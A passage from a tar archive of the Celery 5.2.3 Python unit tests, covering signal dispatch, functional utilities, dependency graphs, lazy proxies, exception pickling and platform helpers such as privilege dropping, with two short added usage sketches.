garbage_collect() finally: a_signal.disconnect(receiver_3) self._testIsClean(a_signal) def test_retry(self): class non_local: counter = 1 def succeeds_eventually(val, **kwargs): non_local.counter += 1 if non_local.counter < 3: raise ValueError('this') return val a_signal.connect(succeeds_eventually, sender=self, retry=True) try: result = a_signal.send(sender=self, val='test') assert non_local.counter == 3 assert result[0][1] == 'test' finally: a_signal.disconnect(succeeds_eventually, sender=self) self._testIsClean(a_signal) def test_retry_with_dispatch_uid(self): uid = 'abc123' a_signal.connect(receiver_1_arg, sender=self, retry=True, dispatch_uid=uid) assert a_signal.receivers[0][0][0] == uid a_signal.disconnect(receiver_1_arg, sender=self, dispatch_uid=uid) self._testIsClean(a_signal) def test_boundmethod(self): a = Callable() a_signal.connect(a.a, sender=self) expected = [(a.a, 'test')] garbage_collect() result = a_signal.send(sender=self, val='test') assert result == expected del a, result, expected garbage_collect() self._testIsClean(a_signal) 
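# --- Illustrative sketch, not part of the original test suite ---
# The tests above exercise celery.utils.dispatch.Signal.  This is a minimal,
# hedged usage sketch built only from the calls shown in those tests;
# `build_finished`, `Builder` and `announce` are hypothetical names.
def _demo_signal_usage():
    from celery.utils.dispatch import Signal

    build_finished = Signal(providing_args=['val'], use_caching=False)

    class Builder:
        """Hypothetical sender type, mirroring sender=self in the tests."""

    def announce(val, **kwargs):
        # Receivers take the documented argument plus **kwargs; send()
        # collects their return values as (receiver, response) pairs.
        return val

    # dispatch_uid deduplicates registrations (see test_uid_registration).
    build_finished.connect(announce, dispatch_uid='announce-once')
    responses = build_finished.send(sender=Builder(), val='v1.0')
    assert responses == [(announce, 'v1.0')]
    build_finished.disconnect(dispatch_uid='announce-once')
    assert not build_finished.has_listeners()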
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_functional.py0000664000175000017500000003174200000000000021041 0ustar00asifasif00000000000000import collections import pytest import pytest_subtests # noqa: F401 from kombu.utils.functional import lazy from celery.utils.functional import (DummyContext, first, firstmethod, fun_accepts_kwargs, fun_takes_argument, head_from_fun, lookahead, maybe_list, mlazy, padlist, regen, seq_concat_item, seq_concat_seq) def test_DummyContext(): with DummyContext(): pass with pytest.raises(KeyError): with DummyContext(): raise KeyError() @pytest.mark.parametrize('items,n,default,expected', [ (['George', 'Costanza', 'NYC'], 3, None, ['George', 'Costanza', 'NYC']), (['George', 'Costanza'], 3, None, ['George', 'Costanza', None]), (['George', 'Costanza', 'NYC'], 4, 'Earth', ['George', 'Costanza', 'NYC', 'Earth']), ]) def test_padlist(items, n, default, expected): assert padlist(items, n, default=default) == expected class test_firstmethod: def test_AttributeError(self): assert firstmethod('foo')([object()]) is None def test_handles_lazy(self): class A: def __init__(self, value=None): self.value = value def m(self): return self.value assert 'four' == firstmethod('m')([ A(), A(), A(), A('four'), A('five')]) assert 'four' == firstmethod('m')([ A(), A(), A(), lazy(lambda: A('four')), A('five')]) def test_first(): iterations = [0] def predicate(value): iterations[0] += 1 if value == 5: return True return False assert first(predicate, range(10)) == 5 assert iterations[0] == 6 iterations[0] = 0 assert first(predicate, range(10, 20)) is None assert iterations[0] == 10 def test_lookahead(): assert list(lookahead(x for x in range(6))) == [(0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, None)] def test_maybe_list(): assert maybe_list(1) == [1] assert maybe_list([1]) == [1] assert maybe_list(None) is None def test_mlazy(): it = iter(range(20, 30)) p = mlazy(it.__next__) assert p() == 20 assert p.evaluated assert p() == 20 assert repr(p) == '20' class test_regen: def test_list(self): l = [1, 2] r = regen(iter(l)) assert regen(l) is l assert r == l assert r == l # again assert r.__length_hint__() == 0 fun, args = r.__reduce__() assert fun(*args) == l @pytest.fixture def g(self): return regen(iter(list(range(10)))) def test_gen(self, g): assert g[7] == 7 assert g[6] == 6 assert g[5] == 5 assert g[4] == 4 assert g[3] == 3 assert g[2] == 2 assert g[1] == 1 assert g[0] == 0 assert g.data, list(range(10)) assert g[8] == 8 assert g[0] == 0 def test_gen__index_2(self, g): assert g[0] == 0 assert g[1] == 1 assert g.data == list(range(10)) def test_gen__index_error(self, g): assert g[0] == 0 with pytest.raises(IndexError): g[11] assert list(iter(g)) == list(range(10)) def test_gen__negative_index(self, g): assert g[-1] == 9 assert g[-2] == 8 assert g[-3] == 7 assert g[-4] == 6 assert g[-5] == 5 assert g[5] == 5 assert g.data == list(range(10)) assert list(iter(g)) == list(range(10)) def test_nonzero__does_not_consume_more_than_first_item(self): def build_generator(): yield 1 pytest.fail("generator should not consume past first item") yield 2 g = regen(build_generator()) assert bool(g) assert g[0] == 1 def test_nonzero__empty_iter(self): assert not regen(iter([])) def test_deque(self): original_list = [42] d = collections.deque(original_list) # Confirm that concretising a `regen()` instance repeatedly for an # equality check always returns the original list g = regen(d) assert g == original_list assert 
g == original_list def test_repr(self): def die(): raise AssertionError("Generator died") yield None # Confirm that `regen()` instances are not concretised when represented g = regen(die()) assert "..." in repr(g) def test_partial_reconcretisation(self): class WeirdIterator(): def __init__(self, iter_): self.iter_ = iter_ self._errored = False def __iter__(self): yield from self.iter_ if not self._errored: try: # This should stop the regen instance from marking # itself as being done raise AssertionError("Iterator errored") finally: self._errored = True original_list = list(range(42)) g = regen(WeirdIterator(original_list)) iter_g = iter(g) for e in original_list: assert e == next(iter_g) with pytest.raises(AssertionError, match="Iterator errored"): next(iter_g) # The following checks are for the known "misbehaviour" assert getattr(g, "_regen__done") is False # If the `regen()` instance doesn't think it's done then it'll dupe the # elements from the underlying iterator if it can be re-used iter_g = iter(g) for e in original_list * 2: assert next(iter_g) == e with pytest.raises(StopIteration): next(iter_g) assert getattr(g, "_regen__done") is True # Finally we xfail this test to keep track of it raise pytest.xfail(reason="#6794") def test_length_hint_passthrough(self, g): assert g.__length_hint__() == 10 def test_getitem_repeated(self, g): halfway_idx = g.__length_hint__() // 2 assert g[halfway_idx] == halfway_idx # These are now concretised so they should be returned without any work assert g[halfway_idx] == halfway_idx for i in range(halfway_idx + 1): assert g[i] == i # This should only need to concretise one more element assert g[halfway_idx + 1] == halfway_idx + 1 def test_done_does_not_lag(self, g): """ Don't allow regen to return from `__iter__()` and check `__done`. """ # The range we zip with here should ensure that the `regen.__iter__` # call never gets to return since we never attempt a failing `next()` len_g = g.__length_hint__() for i, __ in zip(range(len_g), g): assert getattr(g, "_regen__done") is (i == len_g - 1) # Just for sanity, check against a specific `bool` here assert getattr(g, "_regen__done") is True def test_lookahead_consume(self, subtests): """ Confirm that regen looks ahead by a single item as expected. 
""" def g(): yield from ["foo", "bar"] raise pytest.fail("This should never be reached") with subtests.test(msg="bool does not overconsume"): assert bool(regen(g())) with subtests.test(msg="getitem 0th does not overconsume"): assert regen(g())[0] == "foo" with subtests.test(msg="single iter does not overconsume"): assert next(iter(regen(g()))) == "foo" class ExpectedException(BaseException): pass def g2(): yield from ["foo", "bar"] raise ExpectedException() with subtests.test(msg="getitem 1th does overconsume"): r = regen(g2()) with pytest.raises(ExpectedException): r[1] # Confirm that the item was concretised anyway assert r[1] == "bar" with subtests.test(msg="full iter does overconsume"): r = regen(g2()) with pytest.raises(ExpectedException): for _ in r: pass # Confirm that the items were concretised anyway assert r == ["foo", "bar"] with subtests.test(msg="data access does overconsume"): r = regen(g2()) with pytest.raises(ExpectedException): r.data # Confirm that the items were concretised anyway assert r == ["foo", "bar"] class test_head_from_fun: def test_from_cls(self): class X: def __call__(x, y, kwarg=1): pass g = head_from_fun(X()) with pytest.raises(TypeError): g(1) g(1, 2) g(1, 2, kwarg=3) def test_from_fun(self): def f(x, y, kwarg=1): pass g = head_from_fun(f) with pytest.raises(TypeError): g(1) g(1, 2) g(1, 2, kwarg=3) def test_regression_3678(self): local = {} fun = ('def f(foo, *args, bar="", **kwargs):' ' return foo, args, bar') exec(fun, {}, local) g = head_from_fun(local['f']) g(1) g(1, 2, 3, 4, bar=100) with pytest.raises(TypeError): g(bar=100) def test_from_fun_with_hints(self): local = {} fun = ('def f_hints(x: int, y: int, kwarg: int=1):' ' pass') exec(fun, {}, local) f_hints = local['f_hints'] g = head_from_fun(f_hints) with pytest.raises(TypeError): g(1) g(1, 2) g(1, 2, kwarg=3) def test_from_fun_forced_kwargs(self): local = {} fun = ('def f_kwargs(*, a, b="b", c=None):' ' return') exec(fun, {}, local) f_kwargs = local['f_kwargs'] g = head_from_fun(f_kwargs) with pytest.raises(TypeError): g(1) g(a=1) g(a=1, b=2) g(a=1, b=2, c=3) def test_classmethod(self): class A: @classmethod def f(cls, x): return x fun = head_from_fun(A.f, bound=False) assert fun(A, 1) == 1 fun = head_from_fun(A.f, bound=True) assert fun(1) == 1 def test_kwonly_required_args(self): local = {} fun = ('def f_kwargs_required(*, a="a", b, c=None):' ' return') exec(fun, {}, local) f_kwargs_required = local['f_kwargs_required'] g = head_from_fun(f_kwargs_required) with pytest.raises(TypeError): g(1) with pytest.raises(TypeError): g(a=1) with pytest.raises(TypeError): g(c=1) with pytest.raises(TypeError): g(a=2, c=1) g(b=3) class test_fun_takes_argument: def test_starkwargs(self): assert fun_takes_argument('foo', lambda **kw: 1) def test_named(self): assert fun_takes_argument('foo', lambda a, foo, bar: 1) def fun(a, b, c, d): return 1 assert fun_takes_argument('foo', fun, position=4) def test_starargs(self): assert fun_takes_argument('foo', lambda a, *args: 1) def test_does_not(self): assert not fun_takes_argument('foo', lambda a, bar, baz: 1) assert not fun_takes_argument('foo', lambda: 1) def fun(a, b, foo): return 1 assert not fun_takes_argument('foo', fun, position=4) @pytest.mark.parametrize('a,b,expected', [ ((1, 2, 3), [4, 5], (1, 2, 3, 4, 5)), ((1, 2), [3, 4, 5], [1, 2, 3, 4, 5]), ([1, 2, 3], (4, 5), [1, 2, 3, 4, 5]), ([1, 2], (3, 4, 5), (1, 2, 3, 4, 5)), ]) def test_seq_concat_seq(a, b, expected): res = seq_concat_seq(a, b) assert type(res) is type(expected) assert res == expected 
@pytest.mark.parametrize('a,b,expected', [ ((1, 2, 3), 4, (1, 2, 3, 4)), ([1, 2, 3], 4, [1, 2, 3, 4]), ]) def test_seq_concat_item(a, b, expected): res = seq_concat_item(a, b) assert type(res) is type(expected) assert res == expected class StarKwargsCallable: def __call__(self, **kwargs): return 1 class StarArgsStarKwargsCallable: def __call__(self, *args, **kwargs): return 1 class StarArgsCallable: def __call__(self, *args): return 1 class ArgsCallable: def __call__(self, a, b): return 1 class ArgsStarKwargsCallable: def __call__(self, a, b, **kwargs): return 1 class test_fun_accepts_kwargs: @pytest.mark.parametrize('fun', [ lambda a, b, **kwargs: 1, lambda *args, **kwargs: 1, lambda foo=1, **kwargs: 1, StarKwargsCallable(), StarArgsStarKwargsCallable(), ArgsStarKwargsCallable(), ]) def test_accepts(self, fun): assert fun_accepts_kwargs(fun) @pytest.mark.parametrize('fun', [ lambda a: 1, lambda a, b: 1, lambda *args: 1, lambda a, kw1=1, kw2=2: 1, StarArgsCallable(), ArgsCallable(), ]) def test_rejects(self, fun): assert not fun_accepts_kwargs(fun) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_graph.py0000664000175000017500000000361700000000000020000 0ustar00asifasif00000000000000from unittest.mock import Mock from celery.utils.graph import DependencyGraph from celery.utils.text import WhateverIO class test_DependencyGraph: def graph1(self): res_a = self.app.AsyncResult('A') res_b = self.app.AsyncResult('B') res_c = self.app.GroupResult('C', [res_a]) res_d = self.app.GroupResult('D', [res_c, res_b]) node_a = (res_a, []) node_b = (res_b, []) node_c = (res_c, [res_a]) node_d = (res_d, [res_c, res_b]) return DependencyGraph([ node_a, node_b, node_c, node_d, ]) def test_repr(self): assert repr(self.graph1()) def test_topsort(self): order = self.graph1().topsort() # C must start before D assert order.index('C') < order.index('D') # and B must start before D assert order.index('B') < order.index('D') # and A must start before C assert order.index('A') < order.index('C') def test_edges(self): edges = self.graph1().edges() assert sorted(edges, key=str) == ['C', 'D'] def test_connect(self): x, y = self.graph1(), self.graph1() x.connect(y) def test_valency_of_when_missing(self): x = self.graph1() assert x.valency_of('foobarbaz') == 0 def test_format(self): x = self.graph1() x.formatter = Mock() obj = Mock() assert x.format(obj) x.formatter.assert_called_with(obj) x.formatter = None assert x.format(obj) is obj def test_items(self): assert dict(self.graph1().items()) == { 'A': [], 'B': [], 'C': ['A'], 'D': ['C', 'B'], } def test_repr_node(self): x = self.graph1() assert x.repr_node('fasdswewqewq') def test_to_dot(self): s = WhateverIO() self.graph1().to_dot(s) assert s.getvalue() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_imports.py0000664000175000017500000000635400000000000020375 0ustar00asifasif00000000000000import sys from unittest.mock import Mock, patch import pytest from celery.utils.imports import (NotAPackage, find_module, gen_task_name, module_file, qualname, reload_from_cwd) def test_find_module(): def imp_side_effect(module): if module == 'foo': return None else: raise ImportError(module) assert find_module('celery') imp = Mock() imp.side_effect = imp_side_effect with pytest.raises(NotAPackage) as exc_info: find_module('foo.bar.baz', imp=imp) assert exc_info.value.args[0] == 'foo' assert 
find_module('celery.worker.request') def test_find_module_legacy_namespace_package(tmp_path, monkeypatch): monkeypatch.chdir(str(tmp_path)) (tmp_path / 'pkg' / 'foo').mkdir(parents=True) (tmp_path / 'pkg' / '__init__.py').write_text( 'from pkgutil import extend_path\n' '__path__ = extend_path(__path__, __name__)\n') (tmp_path / 'pkg' / 'foo' / '__init__.py').write_text('') (tmp_path / 'pkg' / 'foo' / 'bar.py').write_text('') with patch.dict(sys.modules): for modname in list(sys.modules): if modname == 'pkg' or modname.startswith('pkg.'): del sys.modules[modname] with pytest.raises(ImportError): find_module('pkg.missing') with pytest.raises(ImportError): find_module('pkg.foo.missing') assert find_module('pkg.foo.bar') with pytest.raises(NotAPackage) as exc_info: find_module('pkg.foo.bar.missing') assert exc_info.value.args[0] == 'pkg.foo.bar' def test_find_module_pep420_namespace_package(tmp_path, monkeypatch): monkeypatch.chdir(str(tmp_path)) (tmp_path / 'pkg' / 'foo').mkdir(parents=True) (tmp_path / 'pkg' / 'foo' / '__init__.py').write_text('') (tmp_path / 'pkg' / 'foo' / 'bar.py').write_text('') with patch.dict(sys.modules): for modname in list(sys.modules): if modname == 'pkg' or modname.startswith('pkg.'): del sys.modules[modname] with pytest.raises(ImportError): find_module('pkg.missing') with pytest.raises(ImportError): find_module('pkg.foo.missing') assert find_module('pkg.foo.bar') with pytest.raises(NotAPackage) as exc_info: find_module('pkg.foo.bar.missing') assert exc_info.value.args[0] == 'pkg.foo.bar' def test_qualname(): Class = type('Fox', (object,), { '__module__': 'quick.brown', }) assert qualname(Class) == 'quick.brown.Fox' assert qualname(Class()) == 'quick.brown.Fox' def test_reload_from_cwd(patching): reload = patching('celery.utils.imports.reload') reload_from_cwd('foo') reload.assert_called() def test_reload_from_cwd_custom_reloader(): reload = Mock() reload_from_cwd('foo', reload) reload.assert_called() def test_module_file(): m1 = Mock() m1.__file__ = '/opt/foo/xyz.pyc' assert module_file(m1) == '/opt/foo/xyz.py' m2 = Mock() m2.__file__ = '/opt/foo/xyz.py' assert module_file(m1) == '/opt/foo/xyz.py' class test_gen_task_name: def test_no_module(self): app = Mock() app.name == '__main__' assert gen_task_name(app, 'foo', 'axsadaewe') ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_local.py0000664000175000017500000001774100000000000017774 0ustar00asifasif00000000000000from unittest.mock import Mock import pytest from celery.local import PromiseProxy, Proxy, maybe_evaluate, try_import class test_try_import: def test_imports(self): assert try_import(__name__) def test_when_default(self): default = object() assert try_import('foobar.awqewqe.asdwqewq', default) is default class test_Proxy: def test_std_class_attributes(self): assert Proxy.__name__ == 'Proxy' assert Proxy.__module__ == 'celery.local' assert isinstance(Proxy.__doc__, str) def test_doc(self): def real(): pass x = Proxy(real, __doc__='foo') assert x.__doc__ == 'foo' def test_name(self): def real(): """real function""" return 'REAL' x = Proxy(lambda: real, name='xyz') assert x.__name__ == 'xyz' y = Proxy(lambda: real) assert y.__name__ == 'real' assert x.__doc__ == 'real function' assert x.__class__ == type(real) assert x.__dict__ == real.__dict__ assert repr(x) == repr(real) assert x.__module__ def test_get_current_local(self): x = Proxy(lambda: 10) object.__setattr__(x, '_Proxy_local', Mock()) assert 
x._get_current_object() def test_bool(self): class X: def __bool__(self): return False __nonzero__ = __bool__ x = Proxy(lambda: X()) assert not x def test_slots(self): class X: __slots__ = () x = Proxy(X) with pytest.raises(AttributeError): x.__dict__ def test_dir(self): class X: def __dir__(self): return ['a', 'b', 'c'] x = Proxy(lambda: X()) assert dir(x) == ['a', 'b', 'c'] class Y: def __dir__(self): raise RuntimeError() y = Proxy(lambda: Y()) assert dir(y) == [] def test_getsetdel_attr(self): class X: a = 1 b = 2 c = 3 def __dir__(self): return ['a', 'b', 'c'] v = X() x = Proxy(lambda: v) assert x.__members__ == ['a', 'b', 'c'] assert x.a == 1 assert x.b == 2 assert x.c == 3 setattr(x, 'a', 10) assert x.a == 10 del(x.a) assert x.a == 1 def test_dictproxy(self): v = {} x = Proxy(lambda: v) x['foo'] = 42 assert x['foo'] == 42 assert len(x) == 1 assert 'foo' in x del(x['foo']) with pytest.raises(KeyError): x['foo'] assert iter(x) def test_listproxy(self): v = [] x = Proxy(lambda: v) x.append(1) x.extend([2, 3, 4]) assert x[0] == 1 assert x[:-1] == [1, 2, 3] del(x[-1]) assert x[:-1] == [1, 2] x[0] = 10 assert x[0] == 10 assert 10 in x assert len(x) == 3 assert iter(x) x[0:2] = [1, 2] del(x[0:2]) assert str(x) def test_complex_cast(self): class O: def __complex__(self): return complex(10.333) o = Proxy(O) assert o.__complex__() == complex(10.333) def test_index(self): class O: def __index__(self): return 1 o = Proxy(O) assert o.__index__() == 1 def test_coerce(self): class O: def __coerce__(self, other): return self, other o = Proxy(O) assert o.__coerce__(3) def test_int(self): assert Proxy(lambda: 10) + 1 == Proxy(lambda: 11) assert Proxy(lambda: 10) - 1 == Proxy(lambda: 9) assert Proxy(lambda: 10) * 2 == Proxy(lambda: 20) assert Proxy(lambda: 10) ** 2 == Proxy(lambda: 100) assert Proxy(lambda: 20) / 2 == Proxy(lambda: 10) assert Proxy(lambda: 20) // 2 == Proxy(lambda: 10) assert Proxy(lambda: 11) % 2 == Proxy(lambda: 1) assert Proxy(lambda: 10) << 2 == Proxy(lambda: 40) assert Proxy(lambda: 10) >> 2 == Proxy(lambda: 2) assert Proxy(lambda: 10) ^ 7 == Proxy(lambda: 13) assert Proxy(lambda: 10) | 40 == Proxy(lambda: 42) assert Proxy(lambda: 10) != Proxy(lambda: -11) assert Proxy(lambda: 10) != Proxy(lambda: -10) assert Proxy(lambda: -10) == Proxy(lambda: -10) assert Proxy(lambda: 10) < Proxy(lambda: 20) assert Proxy(lambda: 20) > Proxy(lambda: 10) assert Proxy(lambda: 10) >= Proxy(lambda: 10) assert Proxy(lambda: 10) <= Proxy(lambda: 10) assert Proxy(lambda: 10) == Proxy(lambda: 10) assert Proxy(lambda: 20) != Proxy(lambda: 10) assert Proxy(lambda: 100).__divmod__(30) assert Proxy(lambda: 100).__truediv__(30) assert abs(Proxy(lambda: -100)) x = Proxy(lambda: 10) x -= 1 assert x == 9 x = Proxy(lambda: 9) x += 1 assert x == 10 x = Proxy(lambda: 10) x *= 2 assert x == 20 x = Proxy(lambda: 20) x /= 2 assert x == 10 x = Proxy(lambda: 10) x %= 2 assert x == 0 x = Proxy(lambda: 10) x <<= 3 assert x == 80 x = Proxy(lambda: 80) x >>= 4 assert x == 5 x = Proxy(lambda: 5) x ^= 1 assert x == 4 x = Proxy(lambda: 4) x **= 4 assert x == 256 x = Proxy(lambda: 256) x //= 2 assert x == 128 x = Proxy(lambda: 128) x |= 2 assert x == 130 x = Proxy(lambda: 130) x &= 10 assert x == 2 x = Proxy(lambda: 10) assert type(x.__float__()) == float assert type(x.__int__()) == int assert hex(x) assert oct(x) def test_hash(self): class X: def __hash__(self): return 1234 assert hash(Proxy(lambda: X())) == 1234 def test_call(self): class X: def __call__(self): return 1234 assert Proxy(lambda: X())() == 1234 def 
test_context(self): class X: entered = exited = False def __enter__(self): self.entered = True return 1234 def __exit__(self, *exc_info): self.exited = True v = X() x = Proxy(lambda: v) with x as val: assert val == 1234 assert x.entered assert x.exited def test_reduce(self): class X: def __reduce__(self): return 123 x = Proxy(lambda: X()) assert x.__reduce__() == 123 class test_PromiseProxy: def test_only_evaluated_once(self): class X: attr = 123 evals = 0 def __init__(self): self.__class__.evals += 1 p = PromiseProxy(X) assert p.attr == 123 assert p.attr == 123 assert X.evals == 1 def test_callbacks(self): source = Mock(name='source') p = PromiseProxy(source) cbA = Mock(name='cbA') cbB = Mock(name='cbB') cbC = Mock(name='cbC') p.__then__(cbA, p) p.__then__(cbB, p) assert not p.__evaluated__() assert object.__getattribute__(p, '__pending__') assert repr(p) assert p.__evaluated__() with pytest.raises(AttributeError): object.__getattribute__(p, '__pending__') cbA.assert_called_with(p) cbB.assert_called_with(p) assert p.__evaluated__() p.__then__(cbC, p) cbC.assert_called_with(p) with pytest.raises(AttributeError): object.__getattribute__(p, '__pending__') def test_maybe_evaluate(self): x = PromiseProxy(lambda: 30) assert not x.__evaluated__() assert maybe_evaluate(x) == 30 assert maybe_evaluate(x) == 30 assert maybe_evaluate(30) == 30 assert x.__evaluated__() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_nodenames.py0000664000175000017500000000031200000000000020635 0ustar00asifasif00000000000000from kombu import Queue from celery.utils.nodenames import worker_direct class test_worker_direct: def test_returns_if_queue(self): q = Queue('foo') assert worker_direct(q) is q ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_objects.py0000664000175000017500000000025400000000000020322 0ustar00asifasif00000000000000from celery.utils.objects import Bunch class test_Bunch: def test(self): x = Bunch(foo='foo', bar=2) assert x.foo == 'foo' assert x.bar == 2 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/utils/test_pickle.py0000664000175000017500000000255200000000000020143 0ustar00asifasif00000000000000from celery.utils.serialization import pickle class RegularException(Exception): pass class ArgOverrideException(Exception): def __init__(self, message, status_code=10): self.status_code = status_code super().__init__(message, status_code) class test_Pickle: def test_pickle_regular_exception(self): exc = None try: raise RegularException('RegularException raised') except RegularException as exc_: exc = exc_ pickled = pickle.dumps({'exception': exc}) unpickled = pickle.loads(pickled) exception = unpickled.get('exception') assert exception assert isinstance(exception, RegularException) assert exception.args == ('RegularException raised',) def test_pickle_arg_override_exception(self): exc = None try: raise ArgOverrideException( 'ArgOverrideException raised', status_code=100, ) except ArgOverrideException as exc_: exc = exc_ pickled = pickle.dumps({'exception': exc}) unpickled = pickle.loads(pickled) exception = unpickled.get('exception') assert exception assert isinstance(exception, ArgOverrideException) assert exception.args == ('ArgOverrideException raised', 100) assert exception.status_code == 100 
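# --- Illustrative sketch, not part of the original test suite ---
# The ArgOverrideException case above forwards its extra value to
# super().__init__(), which keeps it inside exc.args; that is what lets the
# pickle round-trip restore both the message and the status code.  A hedged
# demo of the same pattern; `QuotaExceeded` is a hypothetical name, defined
# at module level so pickle can locate the class by reference.
class QuotaExceeded(Exception):
    def __init__(self, message, limit=0):
        self.limit = limit
        # Forward both values so they end up in self.args.
        super().__init__(message, limit)


def _demo_pickle_custom_exception():
    # Not collected by pytest; run by hand to see the attributes survive.
    from celery.utils.serialization import pickle

    exc = pickle.loads(pickle.dumps(QuotaExceeded('over quota', limit=10)))
    assert exc.args == ('over quota', 10)
    assert exc.limit == 10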
././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/t/unit/utils/test_platforms.py0000664000175000017500000010074300000000000020704 0ustar00asifasif00000000000000import errno import os import re import signal import sys import tempfile from unittest.mock import Mock, call, patch import pytest import t.skip from celery import _find_option_with_arg, platforms from celery.exceptions import SecurityError, SecurityWarning from celery.platforms import (ASSUMING_ROOT, ROOT_DISALLOWED, ROOT_DISCOURAGED, DaemonContext, LockFailed, Pidfile, _setgroups_hack, check_privileges, close_open_fds, create_pidlock, detached, fd_by_path, get_fdmax, ignore_errno, initgroups, isatty, maybe_drop_privileges, parse_gid, parse_uid, set_mp_process_title, set_pdeathsig, set_process_title, setgid, setgroups, setuid, signals) from celery.utils.text import WhateverIO from t.unit import conftest try: import resource except ImportError: # pragma: no cover resource = None def test_isatty(): fh = Mock(name='fh') assert isatty(fh) is fh.isatty() fh.isatty.side_effect = AttributeError() assert not isatty(fh) class test_find_option_with_arg: def test_long_opt(self): assert _find_option_with_arg( ['--foo=bar'], long_opts=['--foo']) == 'bar' def test_short_opt(self): assert _find_option_with_arg( ['-f', 'bar'], short_opts=['-f']) == 'bar' @t.skip.if_win32 def test_fd_by_path(): test_file = tempfile.NamedTemporaryFile() try: keep = fd_by_path([test_file.name]) assert keep == [test_file.file.fileno()] with patch('os.open') as _open: _open.side_effect = OSError() assert not fd_by_path([test_file.name]) finally: test_file.close() def test_close_open_fds(patching): _close = patching('os.close') fdmax = patching('billiard.compat.get_fdmax') with patch('os.closerange', create=True) as closerange: fdmax.return_value = 3 close_open_fds() if not closerange.called: _close.assert_has_calls([call(2), call(1), call(0)]) _close.side_effect = OSError() _close.side_effect.errno = errno.EBADF close_open_fds() class test_ignore_errno: def test_raises_EBADF(self): with ignore_errno('EBADF'): exc = OSError() exc.errno = errno.EBADF raise exc def test_otherwise(self): with pytest.raises(OSError): with ignore_errno('EBADF'): exc = OSError() exc.errno = errno.ENOENT raise exc class test_set_process_title: def test_no_setps(self): prev, platforms._setproctitle = platforms._setproctitle, None try: set_process_title('foo') finally: platforms._setproctitle = prev @patch('celery.platforms.set_process_title') @patch('celery.platforms.current_process') def test_mp_no_hostname(self, current_process, set_process_title): current_process().name = 'Foo' set_mp_process_title('foo', info='hello') set_process_title.assert_called_with('foo:Foo', info='hello') @patch('celery.platforms.set_process_title') @patch('celery.platforms.current_process') def test_mp_hostname(self, current_process, set_process_title): current_process().name = 'Foo' set_mp_process_title('foo', hostname='a@q.com', info='hello') set_process_title.assert_called_with('foo: a@q.com:Foo', info='hello') class test_Signals: @patch('signal.getsignal') def test_getitem(self, getsignal): signals['SIGINT'] getsignal.assert_called_with(signal.SIGINT) def test_supported(self): assert signals.supported('INT') assert not signals.supported('SIGIMAGINARY') @t.skip.if_win32 def test_reset_alarm(self): with patch('signal.alarm') as _alarm: signals.reset_alarm() _alarm.assert_called_with(0) def test_arm_alarm(self): if hasattr(signal, 'setitimer'): 
with patch('signal.setitimer', create=True) as seti: signals.arm_alarm(30) seti.assert_called() def test_signum(self): assert signals.signum(13) == 13 assert signals.signum('INT') == signal.SIGINT assert signals.signum('SIGINT') == signal.SIGINT with pytest.raises(TypeError): signals.signum('int') signals.signum(object()) @patch('signal.signal') def test_ignore(self, set): signals.ignore('SIGINT') set.assert_called_with(signals.signum('INT'), signals.ignored) signals.ignore('SIGTERM') set.assert_called_with(signals.signum('TERM'), signals.ignored) @patch('signal.signal') def test_reset(self, set): signals.reset('SIGINT') set.assert_called_with(signals.signum('INT'), signals.default) @patch('signal.signal') def test_setitem(self, set): def handle(*args): return args signals['INT'] = handle set.assert_called_with(signal.SIGINT, handle) @patch('signal.signal') def test_setitem_raises(self, set): set.side_effect = ValueError() signals['INT'] = lambda *a: a class test_set_pdeathsig: def test_call(self): set_pdeathsig('SIGKILL') @t.skip.if_win32 def test_call_with_correct_parameter(self): with patch('celery.platforms._set_pdeathsig') as _set_pdeathsig: set_pdeathsig('SIGKILL') _set_pdeathsig.assert_called_once_with(signal.SIGKILL) @t.skip.if_win32 class test_get_fdmax: @patch('resource.getrlimit') def test_when_infinity(self, getrlimit): with patch('os.sysconf') as sysconfig: sysconfig.side_effect = KeyError() getrlimit.return_value = [None, resource.RLIM_INFINITY] default = object() assert get_fdmax(default) is default @patch('resource.getrlimit') def test_when_actual(self, getrlimit): with patch('os.sysconf') as sysconfig: sysconfig.side_effect = KeyError() getrlimit.return_value = [None, 13] assert get_fdmax(None) == 13 @t.skip.if_win32 class test_maybe_drop_privileges: def test_on_windows(self): prev, sys.platform = sys.platform, 'win32' try: maybe_drop_privileges() finally: sys.platform = prev @patch('os.getegid') @patch('os.getgid') @patch('os.geteuid') @patch('os.getuid') @patch('celery.platforms.parse_uid') @patch('celery.platforms.parse_gid') @patch('pwd.getpwuid') @patch('celery.platforms.setgid') @patch('celery.platforms.setuid') @patch('celery.platforms.initgroups') def test_with_uid(self, initgroups, setuid, setgid, getpwuid, parse_gid, parse_uid, getuid, geteuid, getgid, getegid): geteuid.return_value = 10 getuid.return_value = 10 class pw_struct: pw_gid = 50001 def raise_on_second_call(*args, **kwargs): setuid.side_effect = OSError() setuid.side_effect.errno = errno.EPERM setuid.side_effect = raise_on_second_call getpwuid.return_value = pw_struct() parse_uid.return_value = 5001 parse_gid.return_value = 5001 maybe_drop_privileges(uid='user') parse_uid.assert_called_with('user') getpwuid.assert_called_with(5001) setgid.assert_called_with(50001) initgroups.assert_called_with(5001, 50001) setuid.assert_has_calls([call(5001), call(0)]) setuid.side_effect = raise_on_second_call def to_root_on_second_call(mock, first): return_value = [first] def on_first_call(*args, **kwargs): ret, return_value[0] = return_value[0], 0 return ret mock.side_effect = on_first_call to_root_on_second_call(geteuid, 10) to_root_on_second_call(getuid, 10) with pytest.raises(SecurityError): maybe_drop_privileges(uid='user') getuid.return_value = getuid.side_effect = None geteuid.return_value = geteuid.side_effect = None getegid.return_value = 